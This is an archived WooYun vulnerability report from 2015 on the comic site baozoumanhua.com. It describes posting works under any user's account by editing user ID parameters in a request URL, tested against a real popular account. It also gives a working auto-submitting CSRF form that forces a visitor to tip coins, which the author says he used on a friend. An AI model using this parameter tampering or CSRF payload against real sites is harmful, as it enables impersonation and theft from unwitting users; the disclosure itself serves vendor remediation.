当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094948

漏洞标题:暴走漫画越权发暴漫作品(拿王尼玛帐号测试)利用打赏功能发财致富走上人生巅峰

相关厂商:baozoumanhua.com

漏洞作者: 浅蓝

提交时间:2015-02-01 10:23

修复时间:2015-03-18 10:24

公开时间:2015-03-18 10:24

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-01: 细节已通知厂商并且等待厂商处理中
2015-02-01: 厂商已经确认,细节仅向厂商公开
2015-02-11: 细节向核心白帽子及相关领域专家公开
2015-02-21: 细节向普通白帽子公开
2015-03-03: 细节向实习白帽子公开
2015-03-18: 细节向公众公开

简要描述:

王尼玛 摸摸大

详细说明:

#1.越权提交暴漫作品
登录帐号,打开暴走漫画制作器。然后直接发表并且抓包
有一个POST请求
URL为
http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=hack%E6%B5%85%E8%93%9D&userID=2049405&template_id=&domain=baozou
http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=用户名&userID=用户ID&template_id=&domain=baozou
点击提交 在我的作品中就会又多出一个作品
我在搜狗浏览器中,把baozoumanhua.com 和baozou.com 的cookie清除

BIKOY`)EB%}6OII`E{4(}XH.png


}9RMJX)1_H$7X$S7_2LG4}H.png


现在是退出状态
在username和userid中填上我的用户名和ID

http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=hack%E6%B5%85%E8%93%9D&userID=2049405&template_id=&domain=baozou


TX}F2A4H}~GN6CH]WJ]25BN.png


提交

QF$2EHLK][VGJ7`AT1SEB_D.png


用火狐浏览器登录上我的帐号,可以看到我的作品发表了 正在审核中
然后新注册一个帐号 名为wooyunxxx ID为 8311358
得出如下URL
http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=wooyunxxx&userID=8311358&template_id=&domain=baozou
用没有登录的 搜狗浏览器测试

1`G~51DU}F17P)(KX1~`@[8.png


再回去用火狐浏览器看看

${YMZ}QWB7COC]L`6P%P%}T.png


发表成功了
现在拿王尼玛的帐号试
http://baozou.com/users/124604/articles
用户名:王尼玛 ID:124604
得出如下URL
http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=王尼玛&userID=124604&template_id=&domain=baozou

%)`Q[QH$ZGUKGCE9FN]QSX7.png


刚提交的作品是审核中 所以我看不见

漏洞证明:

#2.利用大赏功能发财致富走上人生巅峰
在打赏别的时候抓包
得出URL http://baozou.com/articles/14545974/reward.json
reward=10
把14545974改成自己作品id就行reward的值必须为 10 或100
写个自动提交表单
<form id="sb" action="http://baozou.com/articles/14545974/reward.json" method="post">
<input type=hidden name="reward" value="100">
<script>
document.getElementById('sb').submit();
</script>
</form>
保存到网站里,发给一朋友。

MH8`NVISX_TF7HXRL_KPLF2.png


坑了300尼玛B 哇哈哈哈哈

修复方案:

不造~

版权声明:转载请注明来源 浅蓝@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-02-01 10:35

厂商回复:

唉唉唉

最新状态:

暂无